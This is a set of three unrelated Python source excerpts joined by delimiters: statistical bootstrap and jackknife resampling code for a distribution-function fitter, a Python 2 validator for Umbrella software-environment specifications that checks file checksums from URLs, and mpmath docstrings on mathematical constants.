    if do_jackknife:
        # pre-select (without replacement) which point to drop per iteration
        reject = np.random.choice(n_data, size=n, replace=False)
    for iteration in range(n):
        if not do_jackknife:
            # non-parametric bootstrap: Poisson-fluctuate the sample size,
            # then draw indices uniformly WITH replacement.
            n_draw = max(2, np.random.poisson(self.data.n_data))
            # BUGFIX: randint's upper bound is exclusive, so the previous
            # "self.data.n_data - 1" could never select the last data
            # point; use n_data so every index is drawable.
            s = np.random.randint(0, self.data.n_data, size=n_draw)
        else:
            # boolean mask excluding exactly one data point
            s = np.arange(n_data) != reject[iteration]
        x = self.data.x[s]
        x_err = self.data.x_err[s] if self.data.x_err is not None else None
        r = self.data.r[s] if self.data.r is not None else None
        b = DFFit(
            data=Data(x=x.flatten(), x_err=np.squeeze(x_err), r=r),
            selection=self.selection,
            grid_dx=self.grid_dx,
            model=self.model,
            n_iterations=self.n_iterations,
            keep_eddington_bias=self.keep_eddington_bias,
            correct_lss_bias=self.correct_lss_bias and lss_errors,
            lss_weight=self.lss_weight,
        )
        # warm-start each refit from the full-sample best fit
        b.model.p0 = self.fit.p_best
        p_new[iteration] = b.fit.p_best
    return p_new
def resample(self, n_bootstrap=30, lss_errors=True):
    """
    Performs a bootstrapping of the sample to provide a better covariance estimate.

    The data is resampled ``n_bootstrap`` times using a non-parametric
    bootstrapping method to produce more accurate covariances.

    Parameters
    ----------
    n_bootstrap : int, optional
        Number of bootstrapping iterations.
    lss_errors : bool, optional
        A logical flag specifying whether uncertainties computed via resampling should include errors due to the
        uncertainty of large-scale structure (LSS). If ``True`` the parameter uncertainties are estimated by refitting
        the LSS correction at each resampling iteration. This argument is only considered if ``correct_lss_bias=True``
        and ``n_bootstrap>0``.

    Notes
    -----
    This routine does not return anything, but rather adds properties to the object. Importantly, it adds
    :attr:`~.fit.p_covariance_resample` along with :attr:`~.fit.p_quantile` and :attr:`~.grid.gdf_quantile`.
    """
    p_new = self._refit_to_new_sample(n_bootstrap, lss_errors=lss_errors)
    # compute covariance (rows of p_new are iterations, hence the transpose)
    self.fit.p_covariance_resample = np.cov(p_new.T)
    # make parameter quantiles (~2-sigma low, 1-sigma low/high, ~2-sigma high)
    q = [2.0, 16, 84.0, 98.0]
    self.fit.p_quantile = np.percentile(p_new, q, axis=0)
    # make DF quantiles: evaluate the GDF on the grid for every bootstrap fit
    s = np.empty((n_bootstrap, self.grid.n_points))
    for i in range(n_bootstrap):
        s[i] = self.model.gdf(*self.grid.x, p=p_new[i])
    y_quant = np.empty((4, self.grid.n_points))
    for i in range(self.grid.n_points):
        # BUGFIX: the previous mask negated "isnan AND isfinite", which is
        # always False, so the negation filtered nothing; keep only
        # realisations that are finite and positive.
        lst = np.logical_and(np.isfinite(s[:, i]), s[:, i] > 0)
        y_quant[:, i] = np.percentile(s[lst, i], q)
    self.grid.gdf_quantile = y_quant
def jackknife(self, n_jackknife=30, lss_errors=True):
    """
    Perform a jack-knife resampling to account for bias in the estimator.

    The data is jackknife-resampled ``n_jackknife`` times,
    removing exactly one data point from the observed set at each iteration. This resampling adds model parameters,
    maximum likelihood estimator (MLE) bias corrected parameter estimates (corrected to order 1/N).

    Parameters
    ----------
    n_jackknife : int
        The number of re-samplings to perform. If ``n_jackknife`` is larger than the number of data points N,
        it is automatically reduced to N.
    lss_errors : bool, optional
        A logical flag specifying whether uncertainties computed via resampling should include errors due to the
        uncertainty of large-scale structure (LSS). If ``True`` the parameter uncertainties are estimated by refitting
        the LSS correction at each resampling iteration. This argument is only considered if ``correct_lss_bias=True``
        and ``n_jackknife>0``.

    Notes
    -----
    This routine does not return anything, but rather adds properties to the object. Importantly, it adds
    :attr:`~.fit.p_covariance_jackknife`.
    """
    p_new = self._refit_to_new_sample(
        n_jackknife, do_jackknife=True, lss_errors=lss_errors
    )
    # estimate covariance
    n_data = self.data.n_data
    npar = self.model.n_param
    # BUGFIX: "x != np.nan" is always True under IEEE-754, so failed
    # (NaN) refits were never dropped; use np.isnan instead.
    ok = ~np.isnan(np.sum(p_new, axis=1))
    # BUGFIX: rows of p_new are jackknife iterations, so transpose to make
    # the parameters the covariance variables (matching resample()); this
    # yields an (npar, npar) matrix scaled by the jackknife factor (N - 1).
    cov_jn = np.cov(p_new[ok].T) * (n_data - 1)
    # compute poisson covariance
    jn = DFFit(
        data=self.data,
        selection=self.selection,
        grid_dx=self.grid_dx,
        model=self.model,
        n_iterations=self.n_iterations,
        keep_eddington_bias=self.keep_eddington_bias,
        correct_lss_bias=self.correct_lss_bias and lss_errors,
        lss_weight=self.lss_weight,
    )
    jn.model.p0 = self.fit.p_best
    jn.options.n_iterations = 1
    q = [0.16, 0.5, 0.84]
    p_pois = np.empty((3, npar))
    for i in range(3):
        # rescale the effective volume as if N were Poisson-fluctuated
        n_new = poisson.ppf(q[i], n_data)
        jn.grid.veff = self.grid.veff * n_new / n_data
        p_pois[i] = jn.fit.p_best
    # BUGFIX: transpose so cov_pois is (npar, npar), commensurate with
    # cov_jn in the sum below.
    cov_pois = np.cov(p_pois.T)
    # estimate combined covariance
    if np.isnan(cov_pois[0, 0]):
        self.fit.p_covariance_jackknife = cov_jn
    else:
        self.fit.p_covariance_jackknife = cov_jn + cov_pois
    # correct estimator bias (to order 1/N)
    # BUGFIX: average over the jackknife realisations (axis=0) so that
    # p_reduced has one entry per parameter, matching p_best's shape.
    p_reduced = np.nanmean(p_new, axis=0)
    self.fit.p_best_mle_bias_corrected = (
        n_data * self.fit.p_best - (n_data - 1) * p_reduced
    )
    self.fit.gdf_mle_bias_corrected = lambda x: self.model.gdf(
        x, self.fit.p_best_mle_bias_corrected
    )
    self.fit.scd_mle_bias_corrected = lambda x: self.fit.gdf_mle_bias_corrected(
        x
    ) * self.selection.Veff(x)
    self.grid.gdf_mle_bias_corrected = self.fit.gdf_mle_bias_corrected(self.grid.x)
    self.grid.scd_mle_bias_corrected = self.fit.scd_mle_bias_corrected(self.grid.x)
@cached_property
def posterior(self):
    """
    A :class:`~Posteriors` object representing posterior density of each observed object.

    Notes
    -----
    Creation of this object also adds some quantities to the :attr:`grid` attribute, notably
    `scd_posterior` and `effective_counts`.
    """
    # Without measurement uncertainties there is no posterior to compute.
    if self.ignore_uncertainties:
        return None
    # Input handling
    x = self.data.x
    x_mesh = self.grid.x
    x_mesh_dv = self.grid.dvolume
    n_data = x.shape[0]
    n_dim = x.shape[1]
    # produce posteriors
    m0 = np.empty((n_data, n_dim))  # posterior mean per object/dimension
    m1 = np.empty((n_data, n_dim))  # posterior standard deviation
    # make posterior PDF for data point i
    rho_corrected = self.rho_corrected(self.fit.p_best)
    s = np.sum(rho_corrected, axis=1)  # shape ndata
    rho_unbiased = self.rho_unbiased(self.fit.p_best)
    # NOTE(review): this squares rho_corrected (not rho_unbiased) despite
    # the variable name — confirm this is intentional.
    rho_unbiased_sqr = np.sum((rho_corrected.T / (s * x_mesh_dv)) ** 2, axis=1)
    # mean, standard deviation and mode
    for j in range(n_dim):
        m0[:, j] = np.sum(x_mesh[j] * rho_corrected, axis=1) / s
        m1[:, j] = np.sqrt(
            np.sum(np.add.outer(-m0[:, j], x_mesh[j]) ** 2 * rho_corrected, axis=1)
            / s
        )
    # mode: grid point with the highest posterior density for each object
    a = np.argmax(rho_corrected, axis=1)
    md = np.array([xj[a] for xj in x_mesh]).T
    posterior = Posteriors(
        x_mean=m0,
        x_stdev=m1,
        x_mode=md,
        # one Gaussian draw per object from the posterior mean/stdev
        x_random=m0 + m1 * np.random.normal(size=(n_data, n_dim)),
    )
    self.grid.scd_posterior = rho_unbiased
    self.grid.effective_counts = (
        rho_unbiased ** 2 / rho_unbiased_sqr
    )  # this equation gives the effective number of sources per bin
    # zero-division above produces inf; treat those bins as empty
    self.grid.effective_counts[np.isinf(self.grid.effective_counts)] = 0
    return posterior
def fit_summary(self, format_for_notebook=False):
"""
Return a string summary of the fit.
Parameters
----------
format_for_notebook : bool, optional
Whether the string should be formatted for printing in a Jupyter
notebook.
Returns
-------
fit_summary : str
A string summary of the fit.
"""
p = self.fit.p_best
string = ""
br = "<br>" if format_for_notebook else "\n"
if self.model.gdf_equation is not None:
string += "%s%s" % (self.model.gdf_equation, br * 2)
# if format_for_notebook:
# string += "\n```\n"
| |
<reponame>crcresearch/daspos-umbrella<gh_stars>1-10
# This file is part of the daspos-umbrella package.
#
# For copyright and licensing information about this package, see the
# NOTICE.txt and LICENSE.txt files in its top-level directory; they are
# available at https://github.com/crcresearch/daspos-umbrella
#
# Licensed under the MIT License (MIT);
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://opensource.org/licenses/MIT
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import urllib2
from umbrella.umbrella_errors import MissingComponentError, ComponentTypeError, ProgrammingError, UmbrellaError, \
REQUIRED_ATTRIBUTE_MISSING_ERROR_CODE, WRONG_ATTRIBUTE_TYPE_ERROR_CODE, WRONG_FILE_SIZE_ERROR_CODE, \
WRONG_MD5_ERROR_CODE, BAD_URL_ERROR_CODE
from umbrella.misc import get_md5_and_file_size
# Keys used internally while walking a specification's schema.
COMPONENT_NAME = "component_name"
TYPE = "type"
NEST = "nest"
END_NEST = "end_nest"

# Components: top-level section names of an Umbrella specification.
SPECIFICATION_NAME = "comment"
SPECIFICATION_DESCRIPTION = "note"
HARDWARE = "hardware"
KERNEL = "kernel"
OS = "os"
PACKAGE_MANAGER = "package_manager"
SOFTWARE = "software"
DATA_FILES = "data"
ENVIRONMENT_VARIABLES = "environ"
COMMANDS = "cmd"
OUTPUT = "output"

# Component keys: attribute names that may appear inside a component.
ARCHITECTURE = "arch"
CORES = "cores"
MEMORY = "memory"
DISK_SPACE = "disk"
NAME = "name"
VERSION = "version"
PACKAGES = "list"
REPOSITORIES = "config"
FILES = "files"
DIRECTORIES = "dirs"
ID = "id"
FILE_NAME = "name"
URL_SOURCES = "source"
MOUNT_POINT = "mountpoint"
MD5 = "checksum"
FILE_SIZE = "size"
FILE_FORMAT = "format"
UNCOMPRESSED_FILE_SIZE = "uncompressed_size"

# Every component name that may appear at the root of a specification.
SPECIFICATION_ROOT_COMPONENT_NAMES = [
    SPECIFICATION_NAME, SPECIFICATION_DESCRIPTION, HARDWARE, KERNEL, OS, PACKAGE_MANAGER, SOFTWARE, DATA_FILES,
    ENVIRONMENT_VARIABLES, COMMANDS, OUTPUT,
]
class Component(object):
    """Base validator for a single component of an Umbrella specification.

    Subclasses override ``_type`` (the expected JSON type of the component's
    value), ``_required_keys`` (a recursive schema of required attributes)
    and ``is_required``.
    """
    # Expected Python type(s) of the component's JSON value (py2 str/unicode).
    _type = (str, unicode)
    # Recursive schema: {key: {TYPE: ..., NEST: {...}}} of required attributes.
    _required_keys = {}
    # Whether the component must be present in every specification.
    is_required = False

    def __init__(self, component_name, component_json=None):
        # component_name: the component's key in the specification root;
        # component_json: the parsed JSON value stored under that key.
        self.name = component_name
        self.component_json = component_json

    @property
    def required_keys(self):
        """Read-only access to this component's required-key schema."""
        return self._required_keys

    def validate(self, error_log, callback_function=None, *args):
        """Validate this component's JSON against its schema.

        Appends an :class:`UmbrellaError` to ``error_log`` for every missing
        or mistyped required attribute and returns True if none were found.

        Raises
        ------
        ComponentTypeError
            If the component's JSON value has the wrong top-level type.
        ProgrammingError
            If ``_required_keys`` is non-empty on a non-dict component.
        """
        is_valid = True
        if not isinstance(self.component_json, self._type):
            # Report the (str, unicode) tuple as plain "string" in messages.
            if isinstance(self._type, tuple):
                the_type = "string"
            else:
                the_type = self._type.__name__
            raise ComponentTypeError(
                "Component \"" + str(self.name) + "\" is of type \"" + str(self.component_json.__class__.__name__) +
                "\" but must be of type \"" + str(the_type) + '"',
                component_name=self.name,
                attempted_type=type(self.component_json),
                correct_type=self._type
            )
        if isinstance(self.component_json, dict):  # Keys only apply to components that are dictionaries
            for key, info in self._required_keys.iteritems():
                if key not in self.component_json:  # Required key is missing
                    is_valid = False
                    umbrella_error = UmbrellaError(
                        error_code=REQUIRED_ATTRIBUTE_MISSING_ERROR_CODE,
                        description="Attribute \"" + str(key) + "\" is required",
                        may_be_temporary=False,
                        component_name=self.name
                    )
                    error_log.append(umbrella_error)
                    # error_log.append("\"%s\" key is required in %s component" % (key, self.name))
                else:  # Required key is there, now check if it is set up right
                    if not self.validate_subcomponent(error_log, self.component_json[key], info, key):  # Call this recursive function and check all pieces
                        is_valid = False
        elif len(self._required_keys) > 0:
            # A schema was declared but the value cannot hold keys at all.
            raise ProgrammingError("Check component \"" + str(self.name) + "\" and its _required_keys")
        return is_valid

    def validate_subcomponent(self, error_log, subcomponent_json, info, key_name):
        """Recursively validate one attribute value against its schema entry.

        ``info`` is either the ``END_NEST`` sentinel (stop descending) or a
        dict with a TYPE entry and, for containers, a NEST sub-schema.
        Errors are appended to ``error_log``; returns True when the subtree
        is valid.
        """
        is_valid = True
        if subcomponent_json is None:
            raise ProgrammingError("subcomponent_json should not be None")
        if info is None:
            raise ProgrammingError("info should not be None")
        if key_name is None:
            raise ProgrammingError("key_name should not be None")
        if info == END_NEST:  # This is used for things that do not need to look deeper (ie config for package_manager)
            return True
        if not isinstance(subcomponent_json, info[TYPE]):  # Check if it is the right type
            is_valid = False
            if isinstance(info[TYPE], tuple):
                the_type = "string"
            else:
                the_type = info[TYPE].__name__
            umbrella_error = UmbrellaError(
                error_code=WRONG_ATTRIBUTE_TYPE_ERROR_CODE,
                description="Attribute \"" + str(key_name) + "\" is of type \"" + str(subcomponent_json.__class__.__name__) +
                "\" but should be of type \"" + str(the_type) + '"',
                may_be_temporary=False, component_name=self.name
            )
            error_log.append(umbrella_error)
            # error_log.append(
            #     '"' + str(key_name) + "\" key or one of its children, in component \"" + str(self.name) +
            #     "\" is of type \"" + str(type(subcomponent_json)) + "\" but should be of type \"" +
            #     str(info[TYPE]) + '"')
        # Dictionaries will have key_names, but lists won't. If it is a list, we will just use last dictionary's key_name
        if isinstance(subcomponent_json, dict):
            for key in subcomponent_json:
                subkey_name = key
                if not self.validate_subcomponent(error_log, subcomponent_json[key], info[NEST], subkey_name):
                    is_valid = False
        if isinstance(subcomponent_json, list):
            for key in subcomponent_json:
                subkey_name = key_name
                if not self.validate_subcomponent(error_log, key, info[NEST], subkey_name):
                    is_valid = False
        return is_valid

    def set_type(self, new_type):
        """Override the expected top-level type of this component."""
        if isinstance(new_type, type):
            self._type = new_type
        else:
            raise TypeError("New type must be of type \"type\". Confusing huh? :)")

    @staticmethod
    def get_specific_component(component_name, component_json):
        """Factory: return the concrete Component subclass instance for
        ``component_name``.

        Raises
        ------
        TypeError
            If ``component_name`` is not a string.
        ValueError
            If the name matches no known component.
        """
        if not isinstance(component_name, (str, unicode)):
            raise TypeError("component_name must be a string.")
        if component_name == SPECIFICATION_NAME:
            return NameComponent(component_name, component_json)
        elif component_name == SPECIFICATION_DESCRIPTION:
            return DescriptionComponent(component_name, component_json)
        elif component_name == HARDWARE:
            return HardwareComponent(component_name, component_json)
        elif component_name == KERNEL:
            return KernelComponent(component_name, component_json)
        elif component_name == OS:
            return OsComponent(component_name, component_json)
        elif component_name == PACKAGE_MANAGER:
            return PackageManagerComponent(component_name, component_json)
        elif component_name == SOFTWARE:
            return SoftwareComponent(component_name, component_json)
        elif component_name == DATA_FILES:
            return DataFileComponent(component_name, component_json)
        elif component_name == ENVIRONMENT_VARIABLES:
            return EnvironmentVariableComponent(component_name, component_json)
        elif component_name == COMMANDS:
            return CommandComponent(component_name, component_json)
        elif component_name == OUTPUT:
            return OutputComponent(component_name, component_json)
        else:
            raise ValueError("There is no component called " + str(component_name))
class MissingComponent(Component):
    """Placeholder for a component name absent from the specification;
    validating it always raises :class:`MissingComponentError`."""
    def validate(self, error_log, callback_function=None, *args):
        # A missing component can never be valid; report it immediately.
        raise MissingComponentError("Component " + str(self.name) + " doesn't exist")
class FileInfo(Component):
    """Validator for a single file entry of a specification component.

    Beyond schema validation, downloads each listed URL source and checks
    the file size and MD5 checksum against the specification.
    """
    _type = dict
    _required_keys = {
        ID: {
            TYPE: (str, unicode),
        },
        URL_SOURCES: {
            TYPE: list,
            NEST: {
                TYPE: (str, unicode),
            },
        },
        FILE_FORMAT: {
            TYPE: (str, unicode),
        },
        MD5: {
            TYPE: (str, unicode),
        },
        # FILE_SIZE should later be changed to int
        FILE_SIZE: {
            TYPE: (str, unicode),
        },
        MOUNT_POINT: {
            TYPE: (str, unicode),
        },
    }

    def __init__(self, file_name, component_name, component_json=None):
        # file_name: the key under which this file appears in its component
        super(FileInfo, self).__init__(component_name, component_json)
        self.file_name = file_name

    def validate(self, error_log, callback_function=None, *args):
        """Validate the schema, then verify size and MD5 of every URL source.

        ``callback_function`` (with ``*args``) is forwarded to the download
        helper. Appends :class:`UmbrellaError` objects to ``error_log`` and
        returns True when everything checks out.
        """
        is_valid = super(FileInfo, self).validate(error_log)
        if is_valid:
            if not isinstance(self.component_json[URL_SOURCES], list):
                raise TypeError('"' + URL_SOURCES + '"' + " must be a list")
            file_info = self._get_file_info()
            for url in file_info[URL_SOURCES]:
                md5, file_size = self._get_md5_and_file_size(error_log, url, file_info, callback_function, *args)
                # NOTE(review): file_info[FILE_SIZE] comes from the spec as a
                # string (see _required_keys), hence the int() conversion.
                if file_size and file_size != int(file_info[FILE_SIZE]):
                    is_valid = False
                    umbrella_error = UmbrellaError(
                        error_code=WRONG_FILE_SIZE_ERROR_CODE,
                        description="File size was " + str(file_size) +
                        " bytes but the specification says it should be " + str(file_info[FILE_SIZE]) +
                        " bytes",
                        may_be_temporary=False,
                        component_name=self.name,
                        file_name=file_info[FILE_NAME],
                        url=url
                    )
                    error_log.append(umbrella_error)
                    # error_log.append(
                    #     "The file named " + str(file_info[FILE_NAME]) + " on component " + str(file_info[COMPONENT_NAME]) +
                    #     " had a file size of " + str(file_size) + " but the specification says it should be " +
                    #     str(file_info[FILE_SIZE])
                    # )
                if md5 and md5 != file_info[MD5]:
                    is_valid = False
                    umbrella_error = UmbrellaError(
                        error_code=WRONG_MD5_ERROR_CODE,
                        description="Checksum was \"" + str(md5) + "\" but the specification says it should be " +
                        str(file_info[MD5]),
                        may_be_temporary=False,
                        component_name=self.name,
                        file_name=file_info[FILE_NAME],
                        url=url
                    )
                    error_log.append(umbrella_error)
                    # error_log.append(
                    #     "The file named " + str(file_info[FILE_NAME]) + " on component " +
                    #     str(file_info[COMPONENT_NAME]) + " from the url source of " + str(url) +
                    #     " had a calculated md5 of " + str(md5) + " but the specification says it should be " +
                    #     str(file_info[MD5])
                    # )
        return is_valid

    def _get_file_info(self):
        """Collect the attributes needed for validation into a flat dict."""
        file_info = {}
        file_info[FILE_NAME] = self.file_name
        file_info[COMPONENT_NAME] = self.name
        file_info[URL_SOURCES] = self.component_json[URL_SOURCES]
        file_info[MD5] = self.component_json[MD5]
        file_info[FILE_SIZE] = self.component_json[FILE_SIZE]
        return file_info

    def _get_md5_and_file_size(self, error_log, the_file_or_url, file_info, callback_function=None, *args):
        """Dispatch to the file-object or URL variant of the checksum helper.

        Returns a ``(md5, file_size)`` tuple; either may be None on failure.
        """
        if hasattr(the_file_or_url, "read"):
            return self._get_md5_and_file_size_via_file(the_file_or_url, file_info[FILE_SIZE], callback_function, *args)
        elif isinstance(the_file_or_url, (str, unicode)):
            return self._get_md5_and_file_size_via_url(error_log, the_file_or_url, file_info, callback_function, *args)
        else:
            raise ValueError("the_file_or_url must be a file or a string form of a url")

    def _get_md5_and_file_size_via_file(self, the_file, actual_file_size, callback_function=None, *args):
        """Compute md5 and size from an already-open file object."""
        if not hasattr(the_file, "read"):
            raise ValueError("the_file must be an open file ")
        return get_md5_and_file_size(the_file, actual_file_size, callback_function, *args)

    def _get_md5_and_file_size_via_url(self, error_log, url, file_info, callback_function=None, *args):
        """Open ``url`` and compute md5 and size of the remote content.

        Network failures are recorded on ``error_log`` as BAD_URL errors
        (marked may_be_temporary) and reported as ``(None, None)`` instead
        of raising.
        """
        if not isinstance(url, (str, unicode)):
            raise ValueError("Url must be in string form ")
        try:
            remote = urllib2.urlopen(url)
        except urllib2.HTTPError as error:
            umbrella_error = UmbrellaError(
                error_code=BAD_URL_ERROR_CODE, description="Http error \"" + str(error) + '"',
                may_be_temporary=True, component_name=str(file_info[COMPONENT_NAME]), file_name=str(file_info[FILE_NAME]),
                url=str(url)
            )
            error_log.append(umbrella_error)
            return None, None
        except urllib2.URLError as error:
            umbrella_error = UmbrellaError(
                error_code=BAD_URL_ERROR_CODE, description="Url error \"" + str(error) + '"',
                may_be_temporary=True, component_name=str(file_info[COMPONENT_NAME]), file_name=str(file_info[FILE_NAME]),
                url=str(url)
            )
            error_log.append(umbrella_error)
            return None, None
        # Get the file_size from the website. Some websites (old ones) may not give this information
        try:
            file_size_from_url = int(remote.headers["content-length"])
        except KeyError:
            file_size_from_url = None
        return get_md5_and_file_size(remote, file_size_from_url, callback_function, *args)
class OsFileInfo(FileInfo):
    """File entry of the ``os`` component.

    Identical schema to :class:`FileInfo` except that MOUNT_POINT is not a
    required key.
    """
    _required_keys = {
        ID: {
            TYPE: (str, unicode),
        },
        URL_SOURCES: {
            TYPE: list,
            NEST: {
                TYPE: (str, unicode),
            },
        },
        FILE_FORMAT: {
            TYPE: (str, unicode),
        },
        MD5: {
            TYPE: (str, unicode),
        },
        # FILE_SIZE should later be changed to int
        FILE_SIZE: {
            TYPE: (str, unicode),
        },
    }
class NameComponent(Component):
_type = (str, unicode)
_required_keys = {}
is_required = False
def validate(self, error_log, | |
"""
Extended docstrings for functions.py
"""
pi = r"""
`\pi`, roughly equal to 3.141592654, represents the area of the unit
circle, the half-period of trigonometric functions, and many other
things in mathematics.
Mpmath can evaluate `\pi` to arbitrary precision::
>>> from mpmath import *
>>> mp.dps = 50; mp.pretty = True
>>> +pi
3.1415926535897932384626433832795028841971693993751
This shows digits 99991-100000 of `\pi` (the last digit is actually
a 4 when the decimal expansion is truncated, but here the nearest
rounding is used)::
>>> mp.dps = 100000
>>> str(pi)[-10:]
'5549362465'
**Possible issues**
:data:`pi` always rounds to the nearest floating-point
number when used. This means that exact mathematical identities
involving `\pi` will generally not be preserved in floating-point
arithmetic. In particular, multiples of :data:`pi` (except for
the trivial case ``0*pi``) are *not* the exact roots of
:func:`~mpmath.sin`, but differ roughly by the current epsilon::
>>> mp.dps = 15
>>> sin(pi)
1.22464679914735e-16
One solution is to use the :func:`~mpmath.sinpi` function instead::
>>> sinpi(1)
0.0
See the documentation of trigonometric functions for additional
details.
**References**
* [BorweinBorwein]_
"""
degree = r"""
Represents one degree of angle, `1^{\circ} = \pi/180`, or
about 0.01745329. This constant may be evaluated to arbitrary
precision::
>>> from mpmath import *
>>> mp.dps = 50; mp.pretty = True
>>> +degree
0.017453292519943295769236907684886127134428718885417
The :data:`degree` object is convenient for conversion
to radians::
>>> sin(30 * degree)
0.5
>>> asin(0.5) / degree
30.0
"""
e = r"""
The transcendental number `e` = 2.718281828... is the base of the
natural logarithm (:func:`~mpmath.ln`) and of the exponential function
(:func:`~mpmath.exp`).
Mpmath can evaluate `e` to arbitrary precision::
>>> from mpmath import *
>>> mp.dps = 50; mp.pretty = True
>>> +e
2.7182818284590452353602874713526624977572470937
This shows digits 99991-100000 of `e` (the last digit is actually
a 5 when the decimal expansion is truncated, but here the nearest
rounding is used)::
>>> mp.dps = 100000
>>> str(e)[-10:]
'2100427166'
**Possible issues**
:data:`e` always rounds to the nearest floating-point number
when used, and mathematical identities involving `e` may not
hold in floating-point arithmetic. For example, ``ln(e)``
might not evaluate exactly to 1.
In particular, don't use ``e**x`` to compute the exponential
function. Use ``exp(x)`` instead; this is both faster and more
accurate.
"""
phi = r"""
Represents the golden ratio `\phi = (1+\sqrt 5)/2`,
approximately equal to 1.6180339887. To high precision,
its value is::
>>> from mpmath import *
>>> mp.dps = 50; mp.pretty = True
>>> +phi
1.6180339887498948482045868343656381177203091798058
Formulas for the golden ratio include the following::
>>> (1+sqrt(5))/2
1.6180339887498948482045868343656381177203091798058
>>> findroot(lambda x: x**2-x-1, 1)
1.6180339887498948482045868343656381177203091798058
>>> limit(lambda n: fib(n+1)/fib(n), inf)
1.6180339887498948482045868343656381177203091798058
"""
euler = r"""
Euler's constant or the Euler-Mascheroni constant `\gamma`
= 0.57721566... is a number of central importance to
number theory and special functions. It is defined as the limit
.. math ::
\gamma = \lim_{n\to\infty} H_n - \log n
where `H_n = 1 + \frac{1}{2} + \ldots + \frac{1}{n}` is a harmonic
number (see :func:`~mpmath.harmonic`).
Evaluation of `\gamma` is supported at arbitrary precision::
>>> from mpmath import *
>>> mp.dps = 50; mp.pretty = True
>>> +euler
0.57721566490153286060651209008240243104215933593992
We can also compute `\gamma` directly from the definition,
although this is less efficient::
>>> limit(lambda n: harmonic(n)-log(n), inf)
0.57721566490153286060651209008240243104215933593992
This shows digits 9991-10000 of `\gamma` (the last digit is actually
a 5 when the decimal expansion is truncated, but here the nearest
rounding is used)::
>>> mp.dps = 10000
>>> str(euler)[-10:]
'4679858166'
Integrals, series, and representations for `\gamma` in terms of
special functions include the following (there are many others)::
>>> mp.dps = 25
>>> -quad(lambda x: exp(-x)*log(x), [0,inf])
0.5772156649015328606065121
>>> quad(lambda x,y: (x-1)/(1-x*y)/log(x*y), [0,1], [0,1])
0.5772156649015328606065121
>>> nsum(lambda k: 1/k-log(1+1/k), [1,inf])
0.5772156649015328606065121
>>> nsum(lambda k: (-1)**k*zeta(k)/k, [2,inf])
0.5772156649015328606065121
>>> -diff(gamma, 1)
0.5772156649015328606065121
>>> limit(lambda x: 1/x-gamma(x), 0)
0.5772156649015328606065121
>>> limit(lambda x: zeta(x)-1/(x-1), 1)
0.5772156649015328606065121
>>> (log(2*pi*nprod(lambda n:
... exp(-2+2/n)*(1+2/n)**n, [1,inf]))-3)/2
0.5772156649015328606065121
For generalizations of the identities `\gamma = -\Gamma'(1)`
and `\gamma = \lim_{x\to1} \zeta(x)-1/(x-1)`, see
:func:`~mpmath.psi` and :func:`~mpmath.stieltjes` respectively.
**References**
* [BorweinBailey]_
"""
catalan = r"""
Catalan's constant `K` = 0.91596559... is given by the infinite
series
.. math ::
K = \sum_{k=0}^{\infty} \frac{(-1)^k}{(2k+1)^2}.
Mpmath can evaluate it to arbitrary precision::
>>> from mpmath import *
>>> mp.dps = 50; mp.pretty = True
>>> +catalan
0.91596559417721901505460351493238411077414937428167
One can also compute `K` directly from the definition, although
this is significantly less efficient::
>>> nsum(lambda k: (-1)**k/(2*k+1)**2, [0, inf])
0.91596559417721901505460351493238411077414937428167
This shows digits 9991-10000 of `K` (the last digit is actually
a 3 when the decimal expansion is truncated, but here the nearest
rounding is used)::
>>> mp.dps = 10000
>>> str(catalan)[-10:]
'9537871504'
Catalan's constant has numerous integral representations::
>>> mp.dps = 50
>>> quad(lambda x: -log(x)/(1+x**2), [0, 1])
0.91596559417721901505460351493238411077414937428167
>>> quad(lambda x: atan(x)/x, [0, 1])
0.91596559417721901505460351493238411077414937428167
>>> quad(lambda x: ellipk(x**2)/2, [0, 1])
0.91596559417721901505460351493238411077414937428167
>>> quad(lambda x,y: 1/(1+(x*y)**2), [0, 1], [0, 1])
0.91596559417721901505460351493238411077414937428167
As well as series representations::
>>> pi*log(sqrt(3)+2)/8 + 3*nsum(lambda n:
... (fac(n)/(2*n+1))**2/fac(2*n), [0, inf])/8
0.91596559417721901505460351493238411077414937428167
>>> 1-nsum(lambda n: n*zeta(2*n+1)/16**n, [1,inf])
0.91596559417721901505460351493238411077414937428167
"""
khinchin = r"""
Khinchin's constant `K` = 2.68542... is a number that
appears in the theory of continued fractions. Mpmath can evaluate
it to arbitrary precision::
>>> from mpmath import *
>>> mp.dps = 50; mp.pretty = True
>>> +khinchin
2.6854520010653064453097148354817956938203822939945
An integral representation is::
>>> I = quad(lambda x: log((1-x**2)/sincpi(x))/x/(1+x), [0, 1])
>>> 2*exp(1/log(2)*I)
2.6854520010653064453097148354817956938203822939945
The computation of ``khinchin`` is based on an efficient
implementation of the following series::
>>> f = lambda n: (zeta(2*n)-1)/n*sum((-1)**(k+1)/mpf(k)
... for k in range(1,2*int(n)))
>>> exp(nsum(f, [1,inf])/log(2))
2.6854520010653064453097148354817956938203822939945
"""
glaisher = r"""
Glaisher's constant `A`, also known as the Glaisher-Kinkelin
constant, is a number approximately equal to 1.282427129 that
sometimes appears in formulas related to gamma and zeta functions.
It is also related to the Barnes G-function (see :func:`~mpmath.barnesg`).
The constant is defined as `A = \exp(1/12-\zeta'(-1))` where
`\zeta'(s)` denotes the derivative of the Riemann zeta function
(see :func:`~mpmath.zeta`).
Mpmath can evaluate Glaisher's constant to arbitrary precision:
>>> from mpmath import *
>>> mp.dps = 50; mp.pretty = True
>>> +glaisher
1.282427129100622636875342568869791727767688927325
We can verify that the value computed by :data:`glaisher` is
correct using mpmath's facilities for numerical
differentiation and arbitrary evaluation of the zeta function:
>>> exp(mpf(1)/12 - diff(zeta, -1))
1.282427129100622636875342568869791727767688927325
Here is an example of an integral that can be evaluated in
terms of Glaisher's constant:
>>> mp.dps = 15
>>> quad(lambda x: log(gamma(x)), [1, 1.5])
-0.0428537406502909
>>> -0.5 - 7*log(2)/24 + log(pi)/4 + 3*log(glaisher)/2
-0.042853740650291
Mpmath computes Glaisher's constant by applying Euler-Maclaurin
summation to a slowly convergent series. The implementation is
reasonably efficient up to about 10,000 digits. See the source
code for additional details.
References:
http://mathworld.wolfram.com/Glaisher-KinkelinConstant.html
"""
apery = r"""
Represents Apery's constant, which is the irrational number
approximately equal to 1.2020569 given by
.. math ::
\zeta(3) = \sum_{k=1}^\infty\frac{1}{k^3}.
